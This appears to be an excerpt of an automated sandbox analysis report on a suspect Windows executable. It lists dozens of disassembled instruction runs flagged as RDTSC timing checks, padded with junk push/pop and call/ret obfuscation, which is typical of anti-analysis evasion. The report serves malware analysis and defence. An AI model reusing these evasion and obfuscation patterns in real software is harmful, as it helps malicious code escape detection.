Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: FDE37D second address: FDE3F8 instructions: 0x00000000 rdtsc 0x00000002 je 00007F4B9132D696h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a popad 0x0000000b nop 0x0000000c push 00000000h 0x0000000e push ecx 0x0000000f call 00007F4B9132D698h 0x00000014 pop ecx 0x00000015 mov dword ptr [esp+04h], ecx 0x00000019 add dword ptr [esp+04h], 00000015h 0x00000021 inc ecx 0x00000022 push ecx 0x00000023 ret 0x00000024 pop ecx 0x00000025 ret 0x00000026 mov ebx, dword ptr [ebp+122D3526h] 0x0000002c push 00000000h 0x0000002e mov edi, 607ABBACh 0x00000033 push 00000000h 0x00000035 push 00000000h 0x00000037 push edi 0x00000038 call 00007F4B9132D698h 0x0000003d pop edi 0x0000003e mov dword ptr [esp+04h], edi 0x00000042 add dword ptr [esp+04h], 00000014h 0x0000004a inc edi 0x0000004b push edi 0x0000004c ret 0x0000004d pop edi 0x0000004e ret 0x0000004f mov bx, 8622h 0x00000053 xchg eax, esi 0x00000054 jg 00007F4B9132D6A4h 0x0000005a push eax 0x0000005b push eax 0x0000005c push edx 0x0000005d jmp 00007F4B9132D69Bh 0x00000062 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: FDD466 second address: FDD46C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: FDD53E second address: FDD542 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: FDD542 second address: FDD550 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 jng 00007F4B90BE622Ch 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: FDD550 second address: FDD566 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push eax 0x00000006 pushad 0x00000007 jmp 00007F4B9132D69Bh 0x0000000c push eax 0x0000000d push edx 0x0000000e push esi 0x0000000f pop esi 0x00000010 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: FDE5FD second address: FDE60F instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop esi 0x00000007 push eax 0x00000008 je 00007F4B90BE6234h 0x0000000e push eax 0x0000000f push edx 0x00000010 pushad 0x00000011 popad 0x00000012 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: FDE60F second address: FDE613 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: FDF43A second address: FDF451 instructions: 0x00000000 rdtsc 0x00000002 jno 00007F4B90BE6228h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push eax 0x0000000b jl 00007F4B90BE6238h 0x00000011 push eax 0x00000012 push edx 0x00000013 push eax 0x00000014 push edx 0x00000015 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: FDF451 second address: FDF455 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: FDF455 second address: FDF51A instructions: 0x00000000 rdtsc 0x00000002 js 00007F4B90BE6226h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a nop 0x0000000b jo 00007F4B90BE622Bh 0x00000011 mov ebx, 6300E352h 0x00000016 mov dword ptr [ebp+122D1DD8h], ebx 0x0000001c push dword ptr fs:[00000000h] 0x00000023 mov edi, 0B0CE6FCh 0x00000028 mov dword ptr fs:[00000000h], esp 0x0000002f push 00000000h 0x00000031 push ebp 0x00000032 call 00007F4B90BE6228h 0x00000037 pop ebp 0x00000038 mov dword ptr [esp+04h], ebp 0x0000003c add dword ptr [esp+04h], 0000001Dh 0x00000044 inc ebp 0x00000045 push ebp 0x00000046 ret 0x00000047 pop ebp 0x00000048 ret 0x00000049 mov eax, dword ptr [ebp+122D09A1h] 0x0000004f push 00000000h 0x00000051 push ebx 0x00000052 call 00007F4B90BE6228h 0x00000057 pop ebx 0x00000058 mov dword ptr [esp+04h], ebx 0x0000005c add dword ptr [esp+04h], 0000001Dh 0x00000064 inc ebx 0x00000065 push ebx 0x00000066 ret 0x00000067 pop ebx 0x00000068 ret 0x00000069 jmp 00007F4B90BE622Ah 0x0000006e push FFFFFFFFh 0x00000070 jmp 00007F4B90BE6238h 0x00000075 nop 0x00000076 push eax 0x00000077 push edx 0x00000078 pushad 0x00000079 jmp 00007F4B90BE6237h 0x0000007e jl 00007F4B90BE6226h 0x00000084 popad 0x00000085 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: FDF51A second address: FDF524 instructions: 0x00000000 rdtsc 0x00000002 jbe 00007F4B9132D69Ch 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: FE046D second address: FE0471 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: FE0471 second address: FE0477 instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 pop edi 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: FE0477 second address: FE047D instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: FE047D second address: FE0481 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: FE0481 second address: FE0485 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: FE9150 second address: FE9161 instructions: 0x00000000 rdtsc 0x00000002 jl 00007F4B9132D696h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a pop edx 0x0000000b push ebx 0x0000000c pushad 0x0000000d push eax 0x0000000e pop eax 0x0000000f push eax 0x00000010 push edx 0x00000011 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: FE92E8 second address: FE92ED instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop esi 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: FE948E second address: FE94CF instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F4B9132D6A7h 0x00000007 push esi 0x00000008 pop esi 0x00000009 pop edx 0x0000000a pop eax 0x0000000b jmp 00007F4B9132D6A7h 0x00000010 pushad 0x00000011 jmp 00007F4B9132D69Ah 0x00000016 push eax 0x00000017 push edx 0x00000018 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: FE94CF second address: FE94D5 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: FEEFEC second address: FEF013 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 jmp 00007F4B9132D6A7h 0x0000000a popad 0x0000000b push eax 0x0000000c jc 00007F4B9132D6A4h 0x00000012 pushad 0x00000013 push eax 0x00000014 push edx 0x00000015 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: FEF013 second address: FEF019 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: FEF019 second address: FEF028 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 mov eax, dword ptr [esp+04h] 0x00000009 push eax 0x0000000a push edx 0x0000000b push eax 0x0000000c push edx 0x0000000d push edx 0x0000000e pop edx 0x0000000f rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: FEF028 second address: FEF02E instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 pop ebx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: FEF02E second address: FEF061 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jmp 00007F4B9132D6A0h 0x00000008 push ecx 0x00000009 pop ecx 0x0000000a popad 0x0000000b pop edx 0x0000000c pop eax 0x0000000d mov eax, dword ptr [eax] 0x0000000f jmp 00007F4B9132D6A1h 0x00000014 mov dword ptr [esp+04h], eax 0x00000018 pushad 0x00000019 pushad 0x0000001a push eax 0x0000001b push edx 0x0000001c rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: FEF061 second address: FEF067 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: FEF0CE second address: FEF0E1 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F4B9132D69Eh 0x00000009 popad 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: FF5F36 second address: FF5F4D instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F4B90BE6233h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: FF5F4D second address: FF5F5E instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 push esi 0x00000004 pop esi 0x00000005 pop ebx 0x00000006 pop edx 0x00000007 pop eax 0x00000008 pushad 0x00000009 jg 00007F4B9132D69Ch 0x0000000f push eax 0x00000010 push edx 0x00000011 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: FF4B18 second address: FF4B1C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: FF4B1C second address: FF4B20 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: FF52AE second address: FF52D7 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jo 00007F4B90BE6226h 0x0000000a pop edx 0x0000000b push eax 0x0000000c push edx 0x0000000d jmp 00007F4B90BE6234h 0x00000012 jns 00007F4B90BE6228h 0x00000018 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: FF52D7 second address: FF52FF instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jmp 00007F4B9132D69Ch 0x00000008 jmp 00007F4B9132D6A7h 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: FF52FF second address: FF5321 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pushad 0x00000006 jmp 00007F4B90BE6238h 0x0000000b pushad 0x0000000c popad 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: FF5473 second address: FF5485 instructions: 0x00000000 rdtsc 0x00000002 je 00007F4B9132D696h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a jg 00007F4B9132D69Eh 0x00000010 push eax 0x00000011 push edx 0x00000012 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: FF55CE second address: FF55D2 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: FF55D2 second address: FF55DC instructions: 0x00000000 rdtsc 0x00000002 jnp 00007F4B9132D696h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: FF55DC second address: FF55EC instructions: 0x00000000 rdtsc 0x00000002 jo 00007F4B90BE6232h 0x00000008 je 00007F4B90BE6226h 0x0000000e push eax 0x0000000f push edx 0x00000010 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: FF58A8 second address: FF58C0 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F4B9132D6A4h 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: FF58C0 second address: FF58E4 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 jmp 00007F4B90BE622Bh 0x0000000b push eax 0x0000000c push edx 0x0000000d pushad 0x0000000e popad 0x0000000f jmp 00007F4B90BE622Fh 0x00000014 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: FF58E4 second address: FF5912 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F4B9132D6A4h 0x00000007 je 00007F4B9132D696h 0x0000000d pop edx 0x0000000e pop eax 0x0000000f popad 0x00000010 pushad 0x00000011 push eax 0x00000012 push edx 0x00000013 jo 00007F4B9132D696h 0x00000019 jc 00007F4B9132D696h 0x0000001f rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: FF5D7B second address: FF5D81 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: FF5D81 second address: FF5DC5 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 jnl 00007F4B9132D69Eh 0x0000000c pushad 0x0000000d push ecx 0x0000000e pop ecx 0x0000000f push esi 0x00000010 pop esi 0x00000011 jmp 00007F4B9132D6A1h 0x00000016 pushad 0x00000017 popad 0x00000018 popad 0x00000019 pushad 0x0000001a push eax 0x0000001b pop eax 0x0000001c jmp 00007F4B9132D6A2h 0x00000021 push eax 0x00000022 push edx 0x00000023 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: FFC749 second address: FFC74D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: FFC74D second address: FFC751 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: FFC751 second address: FFC765 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 popad 0x00000007 push eax 0x00000008 push edx 0x00000009 jmp 00007F4B90BE622Bh 0x0000000e rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: FFC765 second address: FFC76D instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 push edx 0x00000007 pop edx 0x00000008 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: F7EC40 second address: F7EC4A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 popad 0x00000007 push edi 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 1000B69 second address: 1000B70 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push ebx 0x00000005 pop ebx 0x00000006 popad 0x00000007 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 1000B70 second address: 1000B85 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F4B90BE6230h 0x00000007 push edi 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 100114E second address: 1001152 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 1001586 second address: 100158E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 100158E second address: 10015AA instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push edx 0x00000006 push ecx 0x00000007 pop ecx 0x00000008 pushad 0x00000009 popad 0x0000000a pop edx 0x0000000b popad 0x0000000c push eax 0x0000000d push edx 0x0000000e push eax 0x0000000f jmp 00007F4B9132D69Ah 0x00000014 pushad 0x00000015 popad 0x00000016 pop eax 0x00000017 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 1001728 second address: 100172D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop esi 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 100172D second address: 1001733 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 1001733 second address: 1001737 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 1001737 second address: 100177A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 jl 00007F4B9132D6BCh 0x0000000c jmp 00007F4B9132D6A3h 0x00000011 jmp 00007F4B9132D6A3h 0x00000016 pop edx 0x00000017 pop eax 0x00000018 push eax 0x00000019 push edx 0x0000001a push ecx 0x0000001b jmp 00007F4B9132D69Bh 0x00000020 pop ecx 0x00000021 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 1001BE4 second address: 1001BEA instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 1001BEA second address: 1001BEE instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 1001BEE second address: 1001C0E instructions: 0x00000000 rdtsc 0x00000002 jg 00007F4B90BE6226h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a pushad 0x0000000b push edx 0x0000000c pop edx 0x0000000d jo 00007F4B90BE6226h 0x00000013 push edx 0x00000014 pop edx 0x00000015 push edi 0x00000016 pop edi 0x00000017 popad 0x00000018 jg 00007F4B90BE623Dh 0x0000001e push eax 0x0000001f push edx 0x00000020 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 10034A5 second address: 10034AB instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: F8717C second address: F871A5 instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 jl 00007F4B90BE6226h 0x00000009 pushad 0x0000000a popad 0x0000000b pop esi 0x0000000c push eax 0x0000000d push edx 0x0000000e push edi 0x0000000f pop edi 0x00000010 jmp 00007F4B90BE6239h 0x00000015 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 10068F0 second address: 1006906 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 pushad 0x00000007 popad 0x00000008 popad 0x00000009 pop esi 0x0000000a pushad 0x0000000b js 00007F4B9132D698h 0x00000011 push ecx 0x00000012 pop ecx 0x00000013 pushad 0x00000014 push eax 0x00000015 push edx 0x00000016 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: FC24D6 second address: FC2508 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push eax 0x00000006 jl 00007F4B90BE6232h 0x0000000c jne 00007F4B90BE622Ch 0x00000012 nop 0x00000013 mov ecx, dword ptr [ebp+122D2C44h] 0x00000019 lea eax, dword ptr [ebp+1248727Ah] 0x0000001f mov ecx, dword ptr [ebp+122D2BC8h] 0x00000025 push eax 0x00000026 push eax 0x00000027 push edx 0x00000028 push eax 0x00000029 push edx 0x0000002a pushad 0x0000002b popad 0x0000002c rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: FC2508 second address: FC250C instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: FC250C second address: FC2512 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: FC2512 second address: FAB3B9 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F4B9132D6A2h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 mov dword ptr [esp], eax 0x0000000c push 00000000h 0x0000000e push ebp 0x0000000f call 00007F4B9132D698h 0x00000014 pop ebp 0x00000015 mov dword ptr [esp+04h], ebp 0x00000019 add dword ptr [esp+04h], 00000016h 0x00000021 inc ebp 0x00000022 push ebp 0x00000023 ret 0x00000024 pop ebp 0x00000025 ret 0x00000026 mov ecx, dword ptr [ebp+122D2A7Ch] 0x0000002c mov edx, dword ptr [ebp+122D33B5h] 0x00000032 call dword ptr [ebp+122D334Eh] 0x00000038 push eax 0x00000039 push edx 0x0000003a push eax 0x0000003b push edx 0x0000003c push eax 0x0000003d push edx 0x0000003e rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: FC2CCA second address: FC2CFA instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F4B90BE6230h 0x00000009 popad 0x0000000a push eax 0x0000000b push edx 0x0000000c jmp 00007F4B90BE6239h 0x00000011 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: FC2D3E second address: FC2D7D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ebx 0x00000005 pop ebx 0x00000006 mov dword ptr [esp], esi 0x00000009 push 00000000h 0x0000000b push eax 0x0000000c call 00007F4B9132D698h 0x00000011 pop eax 0x00000012 mov dword ptr [esp+04h], eax 0x00000016 add dword ptr [esp+04h], 0000001Bh 0x0000001e inc eax 0x0000001f push eax 0x00000020 ret 0x00000021 pop eax 0x00000022 ret 0x00000023 mov edx, dword ptr [ebp+122D2D5Ch] 0x00000029 push eax 0x0000002a push eax 0x0000002b push edx 0x0000002c pushad 0x0000002d jl 00007F4B9132D696h 0x00000033 pushad 0x00000034 popad 0x00000035 popad 0x00000036 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: FC2D7D second address: FC2D87 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jg 00007F4B90BE6226h 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: FC2D87 second address: FC2D8B instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: FC2F57 second address: FC2F5C instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: FC3788 second address: FC378D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: FC385D second address: FC3867 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 ja 00007F4B90BE6226h 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: FC3867 second address: FC387A instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 pop ebx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 push eax 0x0000000a push edx 0x0000000b jbe 00007F4B9132D698h 0x00000011 pushad 0x00000012 popad 0x00000013 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: FC387A second address: FC38CA instructions: 0x00000000 rdtsc 0x00000002 jg 00007F4B90BE6228h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a nop 0x0000000b mov dword ptr [ebp+122D2E77h], ecx 0x00000011 mov dh, E1h 0x00000013 lea eax, dword ptr [ebp+124872BEh] 0x00000019 jmp 00007F4B90BE622Ch 0x0000001e nop 0x0000001f jng 00007F4B90BE623Dh 0x00000025 jmp 00007F4B90BE6237h 0x0000002a push eax 0x0000002b push eax 0x0000002c push edx 0x0000002d push ecx 0x0000002e jl 00007F4B90BE6226h 0x00000034 pop ecx 0x00000035 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: FC38CA second address: FC393F instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F4B9132D6A5h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 nop 0x0000000a push 00000000h 0x0000000c push edi 0x0000000d call 00007F4B9132D698h 0x00000012 pop edi 0x00000013 mov dword ptr [esp+04h], edi 0x00000017 add dword ptr [esp+04h], 00000014h 0x0000001f inc edi 0x00000020 push edi 0x00000021 ret 0x00000022 pop edi 0x00000023 ret 0x00000024 cld 0x00000025 lea eax, dword ptr [ebp+1248727Ah] 0x0000002b push 00000000h 0x0000002d push ecx 0x0000002e call 00007F4B9132D698h 0x00000033 pop ecx 0x00000034 mov dword ptr [esp+04h], ecx 0x00000038 add dword ptr [esp+04h], 00000015h 0x00000040 inc ecx 0x00000041 push ecx 0x00000042 ret 0x00000043 pop ecx 0x00000044 ret 0x00000045 mov di, bx 0x00000048 jo 00007F4B9132D69Ch 0x0000004e mov ecx, dword ptr [ebp+122D2C1Ch] 0x00000054 or edi, dword ptr [ebp+122D2BFCh] 0x0000005a push eax 0x0000005b push eax 0x0000005c push edx 0x0000005d pushad 0x0000005e push eax 0x0000005f push edx 0x00000060 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: FC393F second address: FC3946 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push esi 0x00000005 pop esi 0x00000006 popad 0x00000007 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 1006F91 second address: 1006FAA instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F4B9132D6A5h 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 1006FAA second address: 1006FB6 instructions: 0x00000000 rdtsc 0x00000002 jbe 00007F4B90BE6226h 0x00000008 push eax 0x00000009 pop eax 0x0000000a pop edx 0x0000000b pop eax 0x0000000c rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 1006FB6 second address: 1006FC2 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jng 00007F4B9132D696h 0x0000000a pushad 0x0000000b popad 0x0000000c rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 1006FC2 second address: 1006FE3 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F4B90BE6238h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pushad 0x0000000a push ebx 0x0000000b pop ebx 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 1007165 second address: 1007179 instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 pop ebx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 jmp 00007F4B9132D69Eh 0x0000000b rdtsc
